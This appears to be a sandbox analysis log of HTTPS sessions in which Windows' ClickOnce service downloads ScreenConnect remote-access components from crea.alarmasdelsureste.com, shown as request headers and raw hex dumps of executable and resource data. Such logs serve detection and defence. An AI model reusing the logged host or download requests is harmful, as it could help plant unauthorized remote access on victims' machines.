                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16384INData Raw: 70 2f 65 38 57 36 62 76 4b 64 4f 6b 2b 6e 66 54 71 45 6f 73 52 37 47 78 5a 64 65 79 6b 34 38 62 73 4d 31 52 5a 37 54 38 43 6e 4f 31 79 72 4a 33 75 4a 2f 33 35 37 69 34 57 48 75 38 7a 2b 57 33 77 36 2b 4b 50 38 41 75 71 75 66 45 39 6f 30 6a 7a 34 68 51 6a 39 47 2b 61 73 66 57 6b 48 42 2f 33 74 71 31 75 39 2b 32 4b 43 66 67 43 4c 44 54 36 66 67 47 4e 2b 6a 78 6f 72 66 70 31 32 4d 44 36 61 5a 70 49 2b 36 79 2b 56 76 74 2f 76 66 37 37 36 56 59 76 2f 74 7a 2b 55 50 38 6b 4a 65 66 2f 65 72 76 39 41 49 70 57 49 67 4b 51 6e 49 38 43 47 2f 69 6e 41 69 68 4f 72 67 4b 35 33 74 41 44 34 6d 31 44 42 50 74 30 44 67 58 49 7a 54 67 46 2f 38 37 58 42 54 6c 30 6f 77 5a 34 4d 74 73 47 4a 35 4d 43 43 4b 68 4f 6e 51 69 57 6f 4f 51 49 75 46 34 44 43 55 70 7a 4a 41 6e 59 54 56
                                                                                                                                                                                                                                                Data Ascii: p/e8W6bvKdOk+nfTqEosR7GxZdeyk48bsM1RZ7T8CnO1yrJ3uJ/357i4WHu8z+W3w6+KP8AuqufE9o0jz4hQj9G+asfWkHB/3tq1u9+2KCfgCLDT6fgGN+jxorfp12MD6aZpI+6y+Vvt/vf776VYv/tz+UP8kJef/erv9AIpWIgKQnI8CG/inAihOrgK53tAD4m1DBPt0DgXIzTgF/87XBTl0owZ4MtsGJ5MCCKhOnQiWoOQIuF4DCUpzJAnYTV
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16384INData Raw: 41 59 51 42 73 41 48 4d 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 4f 67 4d 41 41 41 36 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 52 67 42 70 41 47 77 41 5a 51 42 55 41 48 49 41 59 51 42 75 41 48 4d 41 5a 67 42 6c 41 48 49 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 50 51 4d 41 41 41 75 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 53 41 42 6c 41 47 77 41 63 41 42 6c 41 48 49 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 4d 4e 41 41 42 49 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 68 41 48 41 41 64 41 42 31 41 48 49 41 5a 51 42 47 41 47 38 41 62 41
                                                                                                                                                                                                                                                Data Ascii: AYQBsAHMAVABpAHQAbABlAOgMAAA6QwBvAG4AdAByAG8AbABQAGEAbgBlAGwARgBpAGwAZQBUAHIAYQBuAHMAZgBlAHIAVABpAHQAbABlAPQMAAAuQwBvAG4AdAByAG8AbABQAGEAbgBlAGwASABlAGwAcABlAHIAVABpAHQAbABlAAMNAABIQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwBhAHAAdAB1AHIAZQBGAG8AbA
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16384INData Raw: 79 41 47 30 41 59 51 42 30 41 45 4d 41 59 51 42 75 41 47 34 41 62 77 42 30 41 46 51 41 63 67 42 70 41 47 63 41 5a 77 42 6c 41 48 49 41 55 41 42 79 41 47 38 41 62 51 42 77 41 48 51 41 42 79 77 41 41 49 59 42 54 51 42 68 41 47 4d 41 52 77 42 79 41 47 45 41 62 67 42 30 41 45 45 41 59 77 42 6a 41 47 55 41 63 77 42 7a 41 47 6b 41 59 67 42 70 41 47 77 41 61 51 42 30 41 48 6b 41 55 41 42 6c 41 48 49 41 62 51 42 70 41 48 4d 41 63 77 42 70 41 47 38 41 62 67 42 7a 41 45 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 4d 41 62 77 42 75 41 47 59 41 61 51 42 6e 41 48 55 41 63 67 42 6c 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 42 6b 4c 51 41 41 62 6b
                                                                                                                                                                                                                                                Data Ascii: yAG0AYQB0AEMAYQBuAG4AbwB0AFQAcgBpAGcAZwBlAHIAUAByAG8AbQBwAHQABywAAIYBTQBhAGMARwByAGEAbgB0AEEAYwBjAGUAcwBzAGkAYgBpAGwAaQB0AHkAUABlAHIAbQBpAHMAcwBpAG8AbgBzAEQAaQBhAGwAbwBnAEMAbwBuAGYAaQBnAHUAcgBlAFAAZQByAG0AaQBzAHMAaQBvAG4AQgB1AHQAdABvAG4AVABlAHgAdABkLQAAbk
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16384INData Raw: 68 64 79 42 76 62 69 42 30 61 47 55 67 63 32 4e 79 5a 57 56 75 4c 67 45 4c 55 32 56 73 5a 57 4e 30 49 46 52 76 62 32 77 42 53 55 4e 6f 62 32 39 7a 5a 53 42 30 61 47 55 67 61 47 56 73 63 43 42 77 63 6d 39 32 61 57 52 6c 63 69 42 30 62 79 42 79 5a 58 52 79 61 57 56 32 5a 53 42 7a 5a 57 46 79 59 32 67 67 63 6d 56 7a 64 57 78 30 63 79 42 76 63 69 42 76 64 47 68 6c 63 69 42 70 62 6d 5a 76 63 6d 31 68 64 47 6c 76 62 69 34 42 44 31 4e 6c 62 47 56 6a 64 43 42 51 63 6d 39 32 61 57 52 6c 63 67 46 65 51 32 68 76 62 33 4e 6c 49 48 52 6f 5a 53 42 30 62 32 39 73 49 48 56 7a 5a 57 51 67 64 47 38 67 63 32 56 73 5a 57 4e 30 49 47 45 67 63 6d 56 6e 61 57 39 75 49 47 39 6d 49 48 52 6f 5a 53 42 7a 59 33 4a 6c 5a 57 34 67 5a 6d 39 79 49 47 39 77 64 47 6c 6a 59 57 77 67 59 32
                                                                                                                                                                                                                                                Data Ascii: hdyBvbiB0aGUgc2NyZWVuLgELU2VsZWN0IFRvb2wBSUNob29zZSB0aGUgaGVscCBwcm92aWRlciB0byByZXRyaWV2ZSBzZWFyY2ggcmVzdWx0cyBvciBvdGhlciBpbmZvcm1hdGlvbi4BD1NlbGVjdCBQcm92aWRlcgFeQ2hvb3NlIHRoZSB0b29sIHVzZWQgdG8gc2VsZWN0IGEgcmVnaW9uIG9mIHRoZSBzY3JlZW4gZm9yIG9wdGljYWwgY2
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16384INData Raw: 6f 5a 58 49 67 53 57 35 7a 64 47 46 75 59 32 55 42 46 30 35 76 49 48 4e 6c 59 58 4a 6a 61 43 42 79 5a 58 4e 31 62 48 52 7a 49 47 5a 76 64 57 35 6b 41 53 56 46 62 6e 52 6c 63 69 42 68 64 43 42 73 5a 57 46 7a 64 43 41 7a 49 47 4e 6f 59 58 4a 68 59 33 52 6c 63 6e 4d 67 64 47 38 67 63 32 56 68 63 6d 4e 6f 41 52 4e 55 65 58 42 6c 49 47 68 6c 63 6d 55 67 64 47 38 67 63 32 56 68 63 6d 4e 6f 41 51 63 6f 52 57 31 77 64 48 6b 70 2d 2d 3e 3c 21 2d 2d 43 6c 69 65 6e 74 2e 4f 76 65 72 72 69 64 65 2e 65 6e 2d 55 53 2e 72 65 73 6f 75 72 63 65 73 2d 2d 3e 3c 21 2d 2d 7a 73 72 76 76 67 45 41 41 41 43 52 41 41 41 41 62 46 4e 35 63 33 52 6c 62 53 35 53 5a 58 4e 76 64 58 4a 6a 5a 58 4d 75 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 46 6b 5a 58 49 73 49 47 31 7a 59 32 39 79 62
                                                                                                                                                                                                                                                Data Ascii: oZXIgSW5zdGFuY2UBF05vIHNlYXJjaCByZXN1bHRzIGZvdW5kASVFbnRlciBhdCBsZWFzdCAzIGNoYXJhY3RlcnMgdG8gc2VhcmNoARNUeXBlIGhlcmUgdG8gc2VhcmNoAQcoRW1wdHkp-->...Client.Override.en-US.resources-->...zsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29yb
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC16384INData Raw: 48 4a 65 41 73 2f 73 34 59 6d 72 45 59 67 67 4a 41 47 36 30 34 71 68 39 71 7a 6d 45 37 69 64 6c 53 32 41 45 48 4a 68 62 63 54 5a 69 63 51 49 4e 59 4a 36 4c 77 62 51 64 6c 78 2f 38 48 6b 4b 50 69 67 58 78 64 4a 62 79 64 78 45 77 6a 56 69 63 51 41 50 41 73 71 58 76 61 53 64 43 51 58 67 39 68 45 36 4c 78 58 43 6d 65 42 6c 48 64 41 4a 75 66 68 39 6a 49 78 59 6e 30 41 42 32 6d 55 52 58 2b 6e 35 68 35 50 4d 7a 46 49 78 42 38 54 4b 4f 2b 41 53 38 39 54 61 2b 52 69 78 4f 6f 41 48 4d 6e 6a 76 33 32 68 45 62 34 6f 50 48 6e 64 44 72 42 57 4e 51 76 49 38 79 50 67 48 48 32 49 6a 46 43 54 53 41 52 66 6e 32 6f 35 62 76 4a 7a 77 2b 54 46 68 55 77 47 34 4a 76 49 4f 41 61 63 54 69 42 42 6f 41 35 74 4c 71 39 7a 6f 71 48 4f 48 78 59 63 4b 69 49 65 79 71 6e 55 53 4b 55 63 44
                                                                                                                                                                                                                                                Data Ascii: HJeAs/s4YmrEYggJAG604qh9qzmE7idlS2AEHJhbcTZicQINYJ6LwbQdlx/8HkKPigXxdJbydxEwjVicQAPAsqXvaSdCQXg9hE6LxXCmeBlHdAJufh9jIxYn0AB2mURX+n5h5PMzFIxB8TKO+AS89Ta+RixOoAHMnjv32hEb4oPHndDrBWNQvI8yPgHH2IjFCTSARfn2o5bvJzw+TFhUwG4JvIOAacTiBBoA5tLq9zoqHOHxYcKiIeyqnUSKUcD
                                                                                                                                                                                                                                                2024-12-22 11:47:02 UTC3467INData Raw: 36 77 72 63 37 30 4a 36 61 42 49 30 41 41 49 34 31 30 44 4b 2b 43 36 6b 56 34 34 6e 67 41 41 6d 4e 59 30 6a 76 67 76 70 30 50 45 45 45 4d 41 6b 70 6e 47 4d 59 52 66 53 73 75 4d 4a 49 49 42 4a 58 49 48 48 73 41 76 70 32 50 45 45 45 4d 41 6b 72 73 42 6a 36 45 49 79 69 42 4a 41 41 4a 4d 61 53 42 6d 2f 43 38 6b 67 53 67 41 42 54 48 49 67 5a 66 77 75 4a 49 4d 6f 41 51 51 77 79 57 6b 63 4b 37 30 41 76 6d 38 51 4a 51 41 43 4f 4e 63 30 6a 6e 76 68 58 55 68 71 73 41 41 45 4d 4b 6b 72 38 47 70 38 46 35 49 61 4c 41 41 42 7a 48 55 37 74 33 51 68 72 61 6a 42 41 6b 41 41 35 78 70 49 75 64 67 4c 34 48 30 31 57 41 41 49 34 46 7a 54 4f 4a 62 43 56 7a 45 73 4f 35 77 41 41 70 6a 55 4e 49 37 34 56 51 78 32 45 51 49 49 59 4a 4a 58 34 50 6e 77 4c 69 53 37 43 41 45 45 4d 4b 6b
                                                                                                                                                                                                                                                Data Ascii: 6wrc70J6aBI0AAI410DK+C6kV44ngAAmNY0jvgvp0PEEEMAkpnGMYRfSsuMJIIBJXIHHsAvp2PEEEMAkrsBj6EIyiBJAAJMaSBm/C8kgSgABTHIgZfwuJIMoAQQwyWkcK70Avm8QJQACONc0jnvhXUhqsAAEMKkr8Gp8F5IaLAABzHU7t3QhrajBAkAA5xpIudgL4H01WAAI4FzTOJbCVzEsO5wAApjUNI74VQx2EQIIYJJX4PnwLiS7CAEEMKk


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.449737104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:04 UTC108OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                2024-12-22 11:47:05 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 17866
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:04 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:05 UTC16169INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                2024-12-22 11:47:05 UTC1697INData Raw: 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 30
                                                                                                                                                                                                                                                Data Ascii: q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.449748104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:13 UTC134OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 95520
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:13 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC16384INData Raw: 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 8b
                                                                                                                                                                                                                                                Data Ascii: t@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC16384INData Raw: 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b 86
                                                                                                                                                                                                                                                Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC16384INData Raw: 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 50
                                                                                                                                                                                                                                                Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9P
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC16384INData Raw: 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 00
                                                                                                                                                                                                                                                Data Ascii: e-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                2024-12-22 11:47:14 UTC13815INData Raw: 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b 37
                                                                                                                                                                                                                                                Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;7


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.449750104.168.134.2324437604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-22 11:47:16 UTC118OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: crea.alarmasdelsureste.com
                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                2024-12-22 11:47:16 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                Content-Length: 61216
                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                Server: ScreenConnect/24.2.10.8991-775909207 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Date: Sun, 22 Dec 2024 11:47:16 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-22 11:47:16 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
                                                                                                                                                                                                                                                2024-12-22 11:47:16 UTC16384INData Raw: 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 06
